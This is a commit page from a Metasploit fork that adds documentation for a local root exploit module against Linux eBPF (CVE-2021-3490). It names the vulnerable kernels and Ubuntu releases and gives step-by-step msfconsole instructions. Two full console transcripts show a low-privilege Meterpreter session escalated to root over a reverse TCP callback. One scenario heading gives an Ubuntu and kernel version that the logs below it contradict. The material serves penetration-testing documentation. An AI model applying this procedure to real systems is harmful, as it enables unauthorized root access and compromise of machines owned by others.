adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Add in first copy of the exploit along with the supporting source code and binaries. Documentation to come

Browse Source
This commit is contained in:
Grant Willcox
2021-08-17 17:19:17 -05:00
parent 3b59829c9e
commit d5df47692c
13 changed files with 1944 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
documentation/modules/exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe.md
+284
View File
@@ -0,0 +1,284 @@
## Vulnerable Application
Linux kernels from 5.7-rc1 prior to 5.13-rc4, 5.12.4, 5.11.21, and
5.10.37 are vulnerable to a bug in the eBPF verifier's verification
of ALU32 operations in the `scalar32_min_max_and` function when performing
AND operations, whereby under certain conditions the bounds of a
32 bit register would not be properly updated.
This can be abused by attackers to conduct an out of bounds read
and write in the Linux kernel and therefore achieve arbitrary
code execution as the `root` user.
The target system must be compiled with eBPF support and not have
`kernel.unprivileged_bpf_disabled` set to `1`, which prevents unprivileged
users from loading eBPF programs into the kernel. Note that if
`kernel.unprivileged_bpf_disabled` is enabled this module can still be
utilized to bypass protections such as SELinux, however the user
must already be logged into the system as a privileged user such as `root`.
### Vulnerable Targets
Ubuntu 20.10 (Groovy Gorilla) kernels 5.8.0-25.26 through 5.8.0-52.58 and Ubuntu 21.04 (Hirsute Hippo) 5.11.0-16.17
## Verification Steps
1. Start `msfconsole`
2. Gain a Linux Meterpreter shell on a target vulnerable system.
3. Do: `use exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe`
4. Do: `set session #` where the session number corresponds to the low privileged Meterpreter session you spawned earlier.
5. Do: `set LHOST <ip of your host>`
6. Do: `set LPORT <port to connect back on>`
7. Do: `exploit`
## Options
### WritableDir
A folder we can write files to. Defaults to `/tmp`
## Scenarios
### Ubuntu 21.04 (with Linux 5.11.0-16-generic)
```
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/bind_tcp
payload => linux/x64/meterpreter/bind_tcp
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (linux/x64/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST no The target address
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > set RHOST 192.168.224.221
RHOST => 192.168.224.221
msf6 exploit(multi/handler) > run
[*] Started bind TCP handler against 192.168.224.221:4444
[*] Sending stage (3012548 bytes) to 192.168.224.221
[*] Meterpreter session 1 opened (192.168.224.128:41855 -> 192.168.224.221:4444) at 2021-08-17 17:37:31 -0500
meterpreter > sysinfo
Computer : 192.168.224.221
OS : Ubuntu 21.04 (Linux 5.11.0-16-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > shell
Process 4636 created.
Channel 1 created.
cat /etc/shadow
cat: /etc/shadow: Permission denied
exit
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/linux test @ ubuntu (uid=1000, gid=1000, euid=1000, 192.168.224.128:41855 -> 192.168.224.221:4444
egid=1000) @ 192.168.224.221 (192.168.224.221)
msf6 exploit(multi/handler) > use exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > show options
Module options (exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.224.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Auto
msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > exploit
[*] Started reverse TCP handler on 192.168.224.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Writing '/tmp/.802fke5' (39352 bytes) ...
[*] Writing '/tmp/.75mogl0Vz6' (250 bytes) ...
[*] Launching exploit ...
[*] Sending stage (3012548 bytes) to 192.168.224.221
[+] Deleted /tmp/.802fke5
[+] Deleted /tmp/.75mogl0Vz6
[*] Meterpreter session 2 opened (192.168.224.128:4444 -> 192.168.224.221:42170) at 2021-08-17 17:40:19 -0500
meterpreter > sysinfo
Computer : 192.168.224.221
OS : Ubuntu 21.04 (Linux 5.11.0-16-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: root @ ubuntu (uid=0, gid=0, euid=0, egid=0)
meterpreter > background
[*] Backgrounding session 2...
smsf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/linux test @ ubuntu (uid=1000, gid=1000, euid=1000, 192.168.224.128:41855 -> 192.168.224.221:4444
egid=1000) @ 192.168.224.221 (192.168.224.221)
2 meterpreter x64/linux root @ ubuntu (uid=0, gid=0, euid=0, egid=0) 192.168.224.128:4444 -> 192.168.224.221:42170
@ 192.168.224.221 (192.168.224.221)
msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) >
```
### Ubuntu 20.04 (with Linux 4.4.0-21-generic)
```
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/bind_tcp
payload => linux/x64/meterpreter/bind_tcp
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (linux/x64/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST no The target address
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > set RHOST 192.168.224.220
RHOST => 192.168.224.220
msf6 exploit(multi/handler) > exploit
[*] Started bind TCP handler against 192.168.224.220:4444
[*] Sending stage (3012548 bytes) to 192.168.224.220
[*] Meterpreter session 1 opened (192.168.224.128:46051 -> 192.168.224.220:4444) at 2021-08-17 17:51:38 -0500
meterpreter > sysinfo
Computer : 192.168.224.220
OS : Ubuntu 20.10 (Linux 5.8.0-25-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: test @ ubuntu (uid=1000, gid=1000, euid=1000, egid=1000)
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > show options
Module options (exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.224.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Auto
msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > check
[*] The target appears to be vulnerable.
msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > exploit
[*] Started reverse TCP handler on 192.168.224.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Writing '/tmp/.8lHII9pIja' (39352 bytes) ...
[*] Writing '/tmp/.x3iDbm3J' (250 bytes) ...
[*] Launching exploit ...
[*] Sending stage (3012548 bytes) to 192.168.224.220
[+] Deleted /tmp/.8lHII9pIja
[+] Deleted /tmp/.x3iDbm3J
[*] Meterpreter session 2 opened (192.168.224.128:4444 -> 192.168.224.220:47878) at 2021-08-17 17:53:36 -0500
meterpreter > sysinfo
Computer : 192.168.224.220
OS : Ubuntu 20.10 (Linux 5.8.0-25-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: root @ ubuntu (uid=0, gid=0, euid=0, egid=0)
meterpreter > background
[*] Backgrounding session 2...
msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/linux test @ ubuntu (uid=1000, gid=1000, euid=1000, 192.168.224.128:46051 -> 192.168.224.220:4444
egid=1000) @ 192.168.224.220 (192.168.224.220)
2 meterpreter x64/linux root @ ubuntu (uid=0, gid=0, euid=0, egid=0) 192.168.224.128:4444 -> 192.168.224.220:47878
@ 192.168.224.220 (192.168.224.220)
msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) >
```